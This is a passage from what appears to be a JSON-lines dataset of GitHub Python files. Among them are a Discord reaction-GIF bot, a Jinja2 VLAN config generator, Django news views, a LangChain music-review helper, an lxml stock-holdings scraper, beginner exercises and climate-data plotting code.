'https://lh3.googleusercontent.com/proxy/d07okqbedXs1Ae13nhCYxIPfo13_98qubAkBRerLLYRFaNAQ-BAtAqeZUPMacOQHHe49j8NN7PB_rqQVgfJ5gJDA_B0UBRfMeFGhjtW7wABEEkqDeaytoNjXlFU',\r\n 'https://cdn.myanimelist.net/s/common/uploaded_files/1483589844-8d0395a7386d12026399620c087f4b97.gif',\r\n 'https://i2.wp.com/nileease.com/wp-content/uploads/2020/12/01ecec4d49676c0a531bf76380561f20.gif?fit=500%2C281&ssl=1',\r\n 'http://37.media.tumblr.com/7bbfd33feb6d790bb656779a05ee99da/tumblr_mtigwpZmhh1si4l9vo1_500.gif'\r\n 'https://cutewallpaper.org/21/romance-anime-with-kissing/Anime-Kissing-GIF-Anime-Kissing-Kiss-Discover-and-Share-GIFs.gif',\r\n 'https://i1.wp.com/nileease.com/wp-content/uploads/2021/03/0939ae60d616a4c7265da52e4abd0089.gif?fit=498%2C284&ssl=1',\r\n 'https://media1.giphy.com/media/nyGFcsP0kAobm/giphy.gif',\r\n 'https://i.imgur.com/0WWWvat.gif',\r\n 'https://data.whicdn.com/images/160215214/original.gif',\r\n 'https://i1.wp.com/loveisaname.com/wp-content/uploads/2016/09/23.gif',\r\n 'https://acegif.com/wp-content/uploads/anime-kissin-8.gif',\r\n 'https://i.imgur.com/OE7lSSY.gif']\r\n url = (random.choice(url))\r\n embed.set_image(url=url)\r\n await ctx.send(embed=embed)\r\n\r\n\r\n@client.command(aleases=[\"лизнуть\"])\r\nasync def лизнуть(ctx,member: discord.Member = None):\r\n if member == ctx.author:\r\n await ctx.send(\"Вы не можете сделать реакцию с самим собой\")\r\n else:\r\n embed = discord.Embed(\r\n title='Реакции',\r\n colour=discord.Colour.from_rgb(153, 204, 255),\r\n description = f\"{ctx.author.mention} лижет {member.mention}\"\r\n )\r\n url = [\r\n 'https://pa1.narvii.com/7101/224b3367affb1ed0dcbead814f3f4ebf89b35a54r1-542-307_hq.gif',\r\n 'https://pa1.narvii.com/7227/36c554aa3bc6b52963f134cf48dfb06422a7367dr1-896-504_hq.gif'\r\n ]\r\n url = (random.choice(url))\r\n embed.set_image(url=url)\r\n await ctx.send(embed=embed)\r\n\r\n@client.command()\r\nasync def ударить(ctx,member: discord.Member = None):\r\n if member == ctx.author:\r\n await ctx.send(\"Вы не можете сделать реакцию с самим собой\")\r\n else:\r\n embed = discord.Embed(\r\n title='Реакции',\r\n colour=discord.Colour.from_rgb(153, 204, 255),\r\n description = f\"{ctx.author.mention} ударяет {member.mention}\"\r\n )\r\n url = ['https://pa1.narvii.com/7194/bb26d1c8a9a978dd6c50b91ffca471d7036b55f4r1-560-315_hq.gif',\r\n 'https://media1.tenor.com/images/299366efafc95bc46bfd2f9c9a46541a/tenor.gif?itemid=16819981',\r\n 'https://media1.tenor.com/images/a0ff9e6e3f65b921d63dfffeec0b94a0/tenor.gif?itemid=7202047',\r\n 'https://pa1.narvii.com/7666/f37253bf56f2a1fbbe984e0ff53ed4138519f849r1-500-281_hq.gif'\r\n\r\n ]\r\n url = (random.choice(url))\r\n embed.set_image(url=url)\r\n await ctx.send(embed=embed)\r\n@client.command()\r\nasync def погладить(ctx,member: discord.Member = None):\r\n if member == ctx.author:\r\n await ctx.send(\"Вы не можете сделать реакцию с самим собой\")\r\n else:\r\n embed = discord.Embed(\r\n title='Реакции',\r\n colour=discord.Colour.from_rgb(153, 204, 255),\r\n description = f\"{ctx.author.mention} гладит {member.mention}\"\r\n )\r\n url = [\r\n 'https://pa1.narvii.com/6607/1f16bfa7ba7763602c172cfef17510ec863872a0_hq.gif',\r\n 'https://thumbs.gfycat.com/TautInformalIndianjackal-small.gif',\r\n 'https://data.whicdn.com/images/258779638/original.gif'\r\n\r\n ]\r\n url = (random.choice(url))\r\n embed.set_image(url=url)\r\n await ctx.send(embed=embed)\r\n\r\n@client.command()\r\nasync def плакать(ctx):\r\n embed = discord.Embed(\r\n title='Реакции',\r\n colour=discord.Colour.from_rgb(153, 204, 255),\r\n description = f\"{ctx.author.mention} плачет\"\r\n )\r\n url = [\r\n 'https://2ch.pm/dr/src/404128/16004095673900.gif',\r\n 'https://data.whicdn.com/images/225223315/original.gif',\r\n 'https://pa1.narvii.com/6827/e839e40326ece5a98e92e21981ce44cbb0cedcb1_hq.gif'\r\n\r\n ]\r\n url = (random.choice(url))\r\n embed.set_image(url=url)\r\n await ctx.send(embed=embed)\r\n\r\n\r\n\r\nclient.run(\"TOKEN\")\r\n","repo_name":"iponer51/botforbkmz","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":25175,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"29403685890","text":"from jinja2 import Environment, FileSystemLoader\n\nfile_loader = FileSystemLoader('.')\n# Load the enviroment\nenv = Environment(loader=file_loader)\n\ntemplate = env.get_template('jtemplate.j2')\n\n#Create the list of VLANs you want to generate configuration for\nvlans = [10,20,30,40,50,60,70,80,90,100]\nip_add=[1,2,3,4,5,6,7,8,9,10]\n\n#Iterate over the list of vlans and print a useable configuration\nfor vlan in vlans:\n output = template.render(vlan=vlan, ip=ip_add)\n \n print(output)","repo_name":"bclayton91/claytonrepo","sub_path":"Python Programs/File Automation/vlans.py","file_name":"vlans.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35596248895","text":"from django.shortcuts import render\nfrom .models import Newspublic\nfrom .forms import PublicForm\nfrom django.shortcuts import redirect\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\n\n# Create your views here.\ndef news_public(request):\n all_public = Newspublic.objects.all().order_by('-date')\n page = request.GET.get('page',1)\n paginator = Paginator(all_public,20)\n try:\n news = paginator.page(page)\n except PageNotAnInteger:\n news = paginator.page(1)\n except EmptyPage:\n news = paginator.page(paginator.num_pages)\n return render(request, 'news.html',{\n 'news':news,\n })\n\ndef detail_public(request,id):\n news = Newspublic.objects.get(pk=id)\n return render(request, 'detial.html',{\n 'news':news,\n })\n\ndef public_upload(request):\n if request.method == 'POST':\n print(\"pass\")\n form = PublicForm(request.POST, request.FILES)\n if form.is_valid():\n print(\"yeah\")\n form.save()\n return redirect('/')\n else:\n print(\"error\")\n form = PublicForm()\n return render(request, 'upload.html', {\n 'form': form,\n })\n\ndef pub_update(request,id):\n u = Newspublic.objects.get(pk=id)\n if not u:\n print(\"error\")\n if request.method == 'POST':\n form = PublicForm(request.POST, request.FILES,instance=u)\n if form.is_valid():\n form.save()\n return redirect('/')\n else:\n form = PublicForm(instance=u)\n return render(request, 'update_form.html', {\n 'form': form,\n })\n\ndef public_delete(request,id):\n u = Newspublic.objects.get(pk=id).delete()\n return HttpResponseRedirect(\"/\")\n\n","repo_name":"MasterTos/NewsPublic","sub_path":"publicNews/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2625889991","text":"from timeit import default_timer\nimport math\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format='%(threadName)s %(message)s')\n\n\ndef exute_time(func):\n def delta_time(*args, **kwargs):\n t1 = default_timer()\n data = func(*args, *kwargs)\n delta = default_timer() - t1\n logging.info(f'Returned data: {data}. Run synchronous time: {delta}')\n return delta_time\n\n\n@exute_time\ndef factorize(number):\n factors = []\n for num in number:\n num_factors = []\n for i in range(1, num + 1):\n if num % i == 0:\n num_factors.append(i)\n factors.append(num_factors)\n return factors\n\n\ntest_numbers = [128, 255, 99999, 10651060]\nfactorize(test_numbers)\n","repo_name":"paukdv/module_3","sub_path":"factorize_sync.py","file_name":"factorize_sync.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72672985047","text":"import argparse\nimport os\nimport glob\nfrom tqdm import tqdm\nimport pybullet as p\n\n\ndef main(args):\n input_dir = args.input_dir\n assert os.path.exists(input_dir), f'{input_dir} not exists'\n\n pathes = glob.glob(f'{input_dir}/*/base.obj')\n for path in tqdm(pathes):\n if '_' in path:\n continue\n print(f'processing {path} ...')\n p.vhacd(path, path, f'{path}.txt')\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--input-dir', '-i', type=str)\n args = parser.parse_args()\n main(args)","repo_name":"Chialiang86/Hanging-Motion-Planning","sub_path":"utils/vhacd.py","file_name":"vhacd.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27862861966","text":"from langchain import LLMChain\nfrom langchain.callbacks.base import BaseCallbackHandler\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.prompts.chat import (\n ChatPromptTemplate,\n HumanMessagePromptTemplate,\n SystemMessagePromptTemplate,\n)\n\nOPENAI_API_KEY = \"\"\n\nPROMPT_CREATE_TEMPLATE = \"\"\"\nDescribe briefly the following piece of music:\n\n{input}\n\nDescribe time period/genre, instrumentation, mood/tone, specific musical elements and tempo/rythm. Follow this examples:\n\n * \"An 80s driving pop song with heavy drums and synth pads in the background\"\n * \"A cheerful country song with acoustic guitars\"\n * \"90s rock song with electric guitar and heavy drums\"\n * \"a light and cheerly EDM track, with syncopated drums, aery pads, and strong emotions bpm: 130\"\n * \"lofi slow bpm electro chill with organic samples\"\n \nFor the period/genre use anything that makes sense with the given music. Have preference over modern music genres.\n \nThe description is:\n\n\"\"\"\n\nROLLING_STONES_REVIEW_TEMPLATE = \"\"\"\nDescribe the following piece of music for the Rolling Stones Magazine. Write an extensive review for the song, which is a hit:\n\nThis is a short description of the song, composed by @MaximumAI, honour it as much as possible on your review:\n{prompt}\n\nThis is the ABC notation of the song:\n{abc}\n\nAvoid mentioning about the ABC file or giving the content. Also avoid mentioning the tempo. \n\nThe description is:\n\n\"\"\"\n\n\ndef generate_prompt(abc):\n return LLMChain(\n llm=ChatOpenAI(\n temperature=0.5,\n model_name=\"gpt-4\",\n openai_api_key=OPENAI_API_KEY,\n ),\n verbose=False,\n prompt=ChatPromptTemplate.from_messages(\n [\n SystemMessagePromptTemplate.from_template(\n \"You are an expert musician. Given a piece of music on ABC notation you can describe how it sounds including genre and mood.\"\n ),\n HumanMessagePromptTemplate.from_template(\n PROMPT_CREATE_TEMPLATE\n ),\n ]\n ),\n ).run(input=abc)\n\n\nclass MyCustomHandler(BaseCallbackHandler):\n def on_llm_new_token(self, token: str, **kwargs) -> None:\n print(f\"My custom handler, token: {token}\")\n\n\ndef describe_music(prompt, abc, callback):\n class MyCustomHandler(BaseCallbackHandler):\n def __init__(self, callback):\n self.callback = callback\n\n def on_llm_new_token(self, token: str, **kwargs) -> None:\n callback(token)\n\n return LLMChain(\n llm=ChatOpenAI(\n streaming=True,\n callbacks=[MyCustomHandler(callback)],\n temperature=0.5,\n model_name=\"gpt-4\",\n openai_api_key=OPENAI_API_KEY,\n ),\n verbose=True,\n prompt=ChatPromptTemplate.from_messages(\n [\n SystemMessagePromptTemplate.from_template(\n \"You are an expert musician and music critic for The Rolling Stones Magazine. Given a piece of music on ABC notation write an excellent review of the song.\"\n ),\n HumanMessagePromptTemplate.from_template(\n ROLLING_STONES_REVIEW_TEMPLATE\n ),\n ]\n ),\n ).generate([{\"abc\": abc, \"prompt\": prompt}])\n","repo_name":"juankysoriano/gpt-producer","sub_path":"gpt_describe.py","file_name":"gpt_describe.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"31"} +{"seq_id":"5963472432","text":"\"\"\" Задача 23: Напишите программу, которая найдёт \nпроизведение пар чисел списка. Парой считаем первый и \nпоследний элемент, второй и предпоследний и т.д.\nПример:\n[2, 3, 4, 5, 6] => [12, 15, 16];\n[2, 3, 5, 6] => [12, 15]\n \"\"\"\n\nimport os\nos.system('cls||clear')\n\nlst = []\nfor i in input(\"Введите числа через пробел:\\n\").split(): # в split по умолчанию пробел\n lst.append(int(i))\nprint(lst, end=\" \")\n\n\"\"\" \nдругой способ вывода списка\nlst = input(\"Введите числа через пробел:\\n\").split() #в split по умолчанию пробел \nlst1 = []\nfor i in range(1, len(lst)+1):\n lst1.append(int(lst[i-1]))\nprint(lst1, end=\" \") \"\"\"\n\n# Решение 1\nnew_lst = []\nfor start in range(0, (len(lst)-1)//2+1):\n new_lst.append(int(lst[start])*int(lst[len(lst)-start-1]))\nprint(f\"=> {new_lst}\")\n\n\"\"\" #Решение 2\nnew_lst=[]\nif len(lst)%2==0:\n middle = len(lst)//2\nelse:\n middle = len(lst)//2+1\nfor start in range(0, middle):\n new_lst.append(int(lst[start])*int(lst[len(lst)-start-1]))\nprint(f\"=> {new_lst}\") \"\"\"\n","repo_name":"Yana-Sushkova/Python_portfolio","sub_path":"Seminar 3/Task 23/23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16418948377","text":"#! python\n# XPathSample.py\n# 入力内容をバッファリングし、XPathで指定した値を取得する\n# 以下がとても参考になった\n# https://vaaaaaanquish.hatenablog.com/entry/2017/06/25/202924\n#\nimport requests # pip install requests\nimport bs4 # pip install beautifulsoup4\nimport sys # nessesaly nead bs4\nimport os # nessesaly nead bs4\nimport logging\nfrom lxml import html # pip install lxml\n# import json\nimport copy\nimport openpyxl # pip install openpyxl\n\n\n# ロギング初期化\nlogging.basicConfig(\n level=logging.DEBUG, # ログレベル\n format=' %(asctime)s - %(levelname)s - %(lineno)s - %(message)s')\n\n# 銘柄情報見出し部分\nMEIGARA_HEAD = \"//table[@class='tbl_dataOutputloop_02']/tr[1]/*\"\n# 銘柄情報データ部分\nMEIGARA_BODY = \"//table[@class='tbl_dataOutputloop_02']/tr[2]\"\n\n# 銘柄一覧見出し\nmeigara_head = ['取得日']\n\n# --------------------------------------------------------\n# json内容をファイル出力\n# --------------------------------------------------------\n\n\ndef filewrite(meigara_dic_list):\n wb = openpyxl.Workbook()\n sheet = wb.active\n sheet.title = '銘柄一覧'\n\n # 初期位置A1から右に見出しを追記\n work_r = 1\n work_c = 1\n logging.debug(\"len : {}\".format(len(meigara_head)))\n for i in range(len(meigara_head)):\n sheet.cell(row=work_r, column=work_c).value = meigara_head[i]\n work_c += 1\n\n # 見出しに沿ってデータを追記\n # 初期位置A2\n work_r = 2\n work_c = 1\n logging.debug(\"meigara_dic_list type:{} data:{}\".format(\n type(meigara_dic_list), meigara_dic_list))\n for dic_item in meigara_dic_list:\n logging.debug(\"dic_item : {}\".format(dic_item))\n work_c = 1\n for i in range(len(meigara_head)):\n # 1列名の取得日はデータを取得した内容ではなく、本日の日付を設定する\n if(i == 0):\n sheet.cell(row=work_r, column=work_c).value = 'yyyy/mm/dd'\n else:\n # 列名に対応する値を取得し、セルに設定\n logging.debug(\"i : {}\".format(i))\n logging.debug(\"meigara_head[i] : {}\".format(meigara_head[i]))\n sheet.cell(\n row=work_r, column=work_c).value = dic_item[meigara_head[i]]\n work_c += 1\n work_r += 1\n\n wb.save('output.xlsx')\n\n# --------------------------------------------------------\n# 汎用Xpath\n# --------------------------------------------------------\n\n\ndef getXpathList(dom, xpathStr):\n logging.debug('=== [{}] start ==='.format(sys._getframe().f_code.co_name))\n result = []\n\n list = dom.xpath(xpathStr)\n logging.debug('== xpath:{} list len:{}'.format(xpathStr, len(list)))\n if list is not None:\n for obj in list:\n logging.debug('== tag:{} text:{} attr:{}'.format(\n obj.tag, obj.text, obj.attrib))\n\n return result\n\n# --------------------------------------------------------\n# 各銘柄を取得し、辞書リスト化 ver3\n# --------------------------------------------------------\n\n\ndef databody3(dom):\n\n listXpath = \"//table[@class='tbl_dataOutputloop_02']//tr\"\n# getXpathList(dom, listXpath)\n listbodyxpaths = [\n \"/td[1]/a\",\n \"/td[2]\",\n \"/td[3]\",\n \"/td[4]/table/tr/td[@class='align_R']\",\n \"/td[5]\",\n \"/td[6]/span[2]\",\n \"/td[7]\"\n ]\n\n domlist = dom.xpath(listXpath)\n\n listhead = []\n tbody = {}\n result = []\n tridx = 0\n# for tridx in range(len(domlist)):\n for tridx in range(10):\n\n headidx = 0\n # 最後のtrタグは評価合計なので集計対象外\n logging.debug('== len:{}'.format(len(domlist)))\n if(tridx == (len(domlist) - 1)):\n break\n\n # 最初のtrタグは見出し\n if(tridx == 0):\n trobj = domlist[tridx]\n for tdobj in trobj:\n logging.debug('== tag:{} text:{}'.format(\n tdobj.tag, tdobj.text.strip()))\n listhead.append(tdobj.text.strip())\n headidx += 1\n continue\n\n # 2番目以降のtrタグはテーブルデータ\n # 取得するXpathが異なるので再度domを取り直す\n for headidx in range(len(listhead)):\n\n logging.debug('== tridx:{} headidx:{}'.format(tridx, headidx))\n bodyxpath = listXpath + \\\n '[' + str(tridx + 1) + ']' + listbodyxpaths[headidx]\n logging.debug('== xpath:{}'.format(bodyxpath))\n bodylist = dom.xpath(bodyxpath)\n\n # 1要素目のみ取得\n obj = bodylist[0]\n logging.debug('== tag:{} text:{}'.format(\n obj.tag, obj.text.strip()))\n tbody[listhead[headidx]] = obj.text.strip()\n\n # tr1要素分を戻り値リストの1要素として登録\n result.append(copy.deepcopy(tbody))\n\n for headobj in listhead:\n meigara_head.append(headobj)\n\n return result\n\n\n# --------------------------------------------------------\n# 各銘柄を取得し、辞書リスト化 ver2\n# --------------------------------------------------------\ndef databody2(dom):\n logging.debug('=== [{}] start ==='.format(sys._getframe().f_code.co_name))\n # 最終的なデータ構成イメージ\n # {\n # '銘柄':'',\n # '保有数量':'',\n # '売却可能数量':'',\n # '平均取得単価':'',\n # '取得金額':'',\n # '評価損益':'',\n # }\n\n result = {}\n\n # 見出しと値を取得するXPath\n listhead = dom.xpath(MEIGARA_HEAD)\n listbodyxpaths = [\n MEIGARA_BODY + \"/td[1]/a\",\n MEIGARA_BODY + \"/td[2]\",\n MEIGARA_BODY + \"/td[3]\",\n MEIGARA_BODY + \"/td[4]/table/tr/td[@class='align_R']\",\n MEIGARA_BODY + \"/td[5]\",\n MEIGARA_BODY + \"/td[6]/span[@class='valueminus']\"\n ]\n\n # XPathで取得した内容をJson形式に割り当てる\n idx = 0\n for idx in range(len(listbodyxpaths)):\n bodylist = dom.xpath(listbodyxpaths[idx])\n for obj in bodylist:\n logging.debug('== tag:{} text:{}'.format(\n obj.tag, obj.text.strip()))\n result[listhead[idx].text.strip()] = obj.text.strip()\n\n # 他で使うので、銘柄一覧の見出し文字列は保持する\n meigara_head.append(listhead[idx].text.strip())\n\n idx += 1\n\n return result\n\n# --------------------------------------------------------\n# 各銘柄を取得し、リスト化\n# ver2ができたことにより、未使用\n# --------------------------------------------------------\n\n\ndef databody(dom):\n logging.debug('=== [{}] start ==='.format(sys._getframe().f_code.co_name))\n # 最終的なデータ構成イメージ\n # {\n # '銘柄':\n # {\n # '保有数量':'',\n # '売却可能数量':'',\n # '平均取得単価':'',\n # '取得金額':'',\n # '評価損益':'',\n # }\n # }\n\n result = {}\n\n listhead = dom.xpath(MEIGARA_HEAD)\n# list = dom.xpath(MEIGARA_BODY)\n# for obj in list:\n# logging.debug('== tag:{} text:{}'.format(obj.tag, obj.text.strip()))\n\n # 銘柄\n list = dom.xpath(MEIGARA_BODY + \"/td[1]/a\")\n for obj in list:\n logging.debug('== tag:{} text:{}'.format(obj.tag, obj.text.strip()))\n result[listhead[1].text] = obj.text.strip()\n\n # 保有数量\n list = dom.xpath(MEIGARA_BODY + \"/td[2]\")\n for obj in list:\n logging.debug('== tag:{} text:{}'.format(obj.tag, obj.text.strip()))\n result[listhead[2]] = obj.text.strip()\n\n # 売却可能数量\n list = dom.xpath(MEIGARA_BODY + \"/td[3]\")\n for obj in list:\n logging.debug('== tag:{} text:{}'.format(obj.tag, obj.text.strip()))\n result[listhead[3]] = obj.text.strip()\n\n # 平均取得単価\n list = dom.xpath(MEIGARA_BODY + \"/td[4]/table/tr/td[@class='align_R']\")\n for obj in list:\n logging.debug('== tag:{} text:{}'.format(obj.tag, obj.text.strip()))\n result[listhead[4]] = obj.text.strip()\n\n # 取得金額\n list = dom.xpath(MEIGARA_BODY + \"/td[5]\")\n for obj in list:\n logging.debug('== tag:{} text:{}'.format(obj.tag, obj.text.strip()))\n result[listhead[5]] = obj.text.strip()\n\n # 評価損益\n list = dom.xpath(MEIGARA_BODY + \"/td[6]/span[@class='valueminus']\")\n for obj in list:\n logging.debug('== tag:{} text:{}'.format(obj.tag, obj.text.strip()))\n result[listhead[6]] = obj.text.strip()\n\n return result\n\n# --------------------------------------------------------\n# 練習\n# --------------------------------------------------------\n\n\ndef study(dom):\n # ルート要素\n localxpath = '/*'\n requests.get(dom, localxpath)\n\n # 属性\n localxpath = \"//div[@id='smenu_AstAdp']/a\"\n requests.get(dom, localxpath)\n\n # 特定の要素(タイトル)\n logging.debug('== タイトル取得')\n list = dom.xpath(\"//a[@title = 'ログアウト']\")\n logging.debug('list idx:{}'.format(len(list)))\n for obj in list:\n logging.debug('== tag:{} text:{}'.format(obj.tag, obj.text))\n\n\n# --------------------------------------------------------\n# 処理本体\n# --------------------------------------------------------\ndef targetRun(filepath):\n logging.debug('=== [{}] start ==='.format(sys._getframe().f_code.co_name))\n\n file1 = open(filepath, mode='r', encoding='shift_jis')\n file2 = open(filepath, mode='r', encoding='shift_jis')\n with file1, file2:\n # ---------------------\n # domオブジェクトの生成\n # ---------------------\n soup = bs4.BeautifulSoup(file1, features='html.parser')\n logging.info(f'soup : {soup}')\n\n # fromstringを使用する場合はstr型ではなくエンコードしたbyte型で渡す必要がある\n text = file2.read().encode('shift_jis')\n # logging.info('file2 type = {}'.format(type(text)))\n dom = html.fromstring(text)\n # parseを使用する場合はファイルパスを渡す\n # dom = html.parse(filepath)\n # logging.info('type = {} dom = {} '.format(type(dom), dom))\n\n # Xpath確認\n getXpathList(\n dom, \"//table[@class='tbl_dataOutputloop_02']//tr[1]/td[1]/a\")\n # -----------------------------\n # domオブジェクトを使用した処理\n # -----------------------------\n meigara_dic = databody3(dom)\n logging.info('== databody3 result:{}'.format(meigara_dic))\n\n # 辞書型のみ対応\n # ensure_ascii=Falseでunicodeエスケープをしない\n # logging.info('== result:{}'.format(json.dumps(meigara_dic, ensure_ascii=False)))\n\n return meigara_dic\n\n\n# --------------------------------------------------------\n# main\n# --------------------------------------------------------\n# テストデータパス\ntargetdatapath = './TestData/sample.html'\n\n# テストメソッド呼び出し\nlogging.debug(os.getcwd())\nmeigara = targetRun(targetdatapath)\nlogging.info('== targetrun result:{}'.format(meigara))\n\n# 引数はリスト型に辞書を入れた形式\nfilewrite(meigara)\n","repo_name":"kick0131/study_python","sub_path":"usage/lxmlUsage/myxpath.py","file_name":"myxpath.py","file_ext":"py","file_size_in_byte":11246,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73643195289","text":"t=int(input(\"\"))\ntl=int(1)\nwhile (tl<=t):\n\ts=input(\"\")\n\tm=input(\"\")\n\ts1=\"\"\n\tfor i in range(len(s)):\n\t\t\tif (s[i]==m[i]):\n\t\t\t\ts1+=\"G\"\n\t\t\telse :\n\t\t\t\ts1+=\"B\"\n\tprint(s1)\n\ttl+=1\n","repo_name":"Deottive/Competetive-Assignments","sub_path":"Source/wordle.py","file_name":"wordle.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15877284599","text":"# Técnicas de iteración\n\n# Creamos un diccionario llamado 'calificaciones' con un nombre y una nota final\ncalificaciones = {\n 'nombre': 'Kevin', \n 'notafinal': 5.0\n}\n\n# Sobrescribimos el diccionario 'calificaciones' con un nuevo conjunto de datos\ncalificaciones = {\n 'Sofia': 5.0, \n 'Ivonne': 5.0,\n 'Helber': 4.5,\n 'Jose Maria': 2.5\n}\n\n# Iteramos sobre el diccionario e imprimimos cada clave y valor\nfor i, j in calificaciones.items():\n print(i, j)\n\n# Imprimimos las claves del diccionario\nprint(\"Técnicas por clave\")\nfor i in calificaciones.keys():\n print(i)\n\n# Imprimimos los valores del diccionario\nprint(\"Iterar por valor\")\nfor j in calificaciones.values():\n print(j)\n\n# Creamos dos listas y las combinamos usando la función zip para iterar sobre ellas simultáneamente\nnombres = ['Maria', 'Sebastian', 'Ana']\nedades = ['18', '25', '30']\nfor n, e in zip(nombres, edades):\n print('Tu nombre es {0} y tu edad es {1}.'.format(n, e))\n\n# Creamos un nuevo diccionario usando una expresión de diccionario y un bucle for\ndicaleatorio = {x: x**2 for x in (2, 4, 6)}\nprint(dicaleatorio)\n\n# Iteramos en reversa sobre un rango de números e imprimimos cada número\nprint(\"Números en reversa\")\nfor i in reversed(range(1, 10, 2)):\n print(i)\n\n# Eliminamos la entrada correspondiente a 'Rosa' del diccionario 'calificaciones'\ndel(calificaciones['Rosa'])\n\n# Iteramos sobre el diccionario actualizado e imprimimos cada clave y valor\nfor i, j in calificaciones.items():\n print(i, j)\n\n\n\n\n\n","repo_name":"Elnegritto/PythonGIT","sub_path":"Taller De Funciones y Diccionarios/Diccionarios/EjercicioN.4.py","file_name":"EjercicioN.4.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71226430168","text":"primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97]\n\nwhile 1:\n\tN = int(input())\n\n\tif(N == 0):\n\t\tbreak\n\t\n\tprimesN = []\n\tfor p in range(0,len(primes)):\n\t\tprimesN.append(0)\n\n\tupperIndex = 0\n\n\tfor n in range(2,N+1):\n\t\tindex = 0\n\n\t\tM = n\n\n\t\twhile M > 1:\n\t\t\tif M%primes[index] == 0:\n\t\t\t\tM/=primes[index]\n\t\t\t\tprimesN[index]+=1\n\t\t\telse:\n\t\t\t\tindex+=1\n\n\t\tif index > upperIndex:\n\t\t\tupperIndex = index\n\t\n\tresult = '{:3d}'.format(N) + \"! =\"\n\tfor p in range(0,len(primesN)+1):\n\t\tif p <= upperIndex:\n\t\t\tif p>0 and p%15 == 0:\n\t\t\t\tresult += '\\n ';\n\t\t\t\n\t\t\tresult += '{:3d}'.format(primesN[p])\n\n\n\tprint(result)\n\n","repo_name":"danhenriquesc/uva-problems-python","sub_path":"160.py","file_name":"160.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37989154535","text":"#Number of odd and even number\r\nlis=input(\"Enter the number \")\r\nlis=list(map(int,lis.split(\",\")))\r\ncount_even=0\r\ncount_odd=0\r\nfor number in lis:\r\n if number%2==0:\r\n count_even+=1\r\n else:\r\n count_odd+=1\r\nprint(\"Total even numbers\",count_even)\r\nprint(\"Total odd numbers\",count_odd)","repo_name":"Ranjana151/python_programming_pratice","sub_path":"counteven_odd.py","file_name":"counteven_odd.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"6820874878","text":"# plot time and longitude averaged cross section plots of INP concentration with superimposed temperature contours\nimport iris\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcols\nimport pandas as pd\nimport pylab\nimport os\nimport glob\n\ndef fmt(x):\n '''format contour labels'''\n s = f\"{x:.1f}\"\n if s.endswith(\"0\"):\n s = f\"{x:.0f}\"\n return f\"{s} \\u00b0C\"\n\ndef limitcontour(ax, x, y, z, clevs, xlim = None, ylim = None, **kwargs):\n '''limit contours to the same plot extent as the INP data'''\n mask = np.ones(x.shape).astype(bool)\n if xlim:\n mask = mask & (x >= xlim[0]) & (x <= xlim[1])\n if ylim:\n mask = mask & (y >= ylim[0]) & (y <= ylim[1])\n xm = np.ma.masked_where(~mask , x)\n ym = np.ma.masked_where(~mask , y)\n zm = np.ma.masked_where(~mask , z)\n\n cs = ax.contour(xm,ym,zm, clevs, cmap = 'Greys_r', **kwargs)\n if xlim: ax.set_xlim(xlim) #Limit the x-axisif ylim: ax.set_ylim(ylim)\n ax.clabel(cs, inline = True, fmt = fmt)\n \n# files and unchanging parameters\nSpringINPnumber_file = sorted(glob.glob('/scratch/lt446/netscratch/bin_sum_nc_files/springINPnc/*'))\nAutumnINPnumber_file = sorted(glob.glob('/scratch/lt446/netscratch/bin_sum_nc_files/autumnINPnc/*'))\n\nSpringTEMP_file = sorted(glob.glob('/scratch/lt446/netscratch/bin_sum_nc_files/springTEMPnc/*'))\nAutumnTEMP_file = sorted(glob.glob('/scratch/lt446/netscratch/bin_sum_nc_files/autumnTEMPnc/*'))\n\nmin_log_level = 0.001\nmax_log_level = 10000\ncmap = 'PuBu' # colour scheme, see https://matplotlib.org/stable/tutorials/colors/colormaps.html\nnorm = mcols.SymLogNorm(linthresh = min_log_level, vmin = 0, vmax = max_log_level) # logarithmic data normalisation\nccont_levels = [10**i for i in range(-4, 5)] # colour contour levels\ncbar_ticks = [10** i for i in range(-4, 5)] # colour bar ticks\nccont_levels_temp = [-60, -50, -40, -30, -20, -10, 0, 10, 20, 30]\ncbar_ticks_temp = [-60, -50, -40, -30, -20, -10, 0, 10, 20, 30]\n\n# plots\nSPRINGdatafield = np.zeros((24, 385))\nTEMPdatafield = np.zeros((24, 385))\ncounter = 0\n\nfor i in range(len(SpringINPnumber_file)): \n \n INPcube = iris.load_cube(SpringINPnumber_file[i])\n INPdata 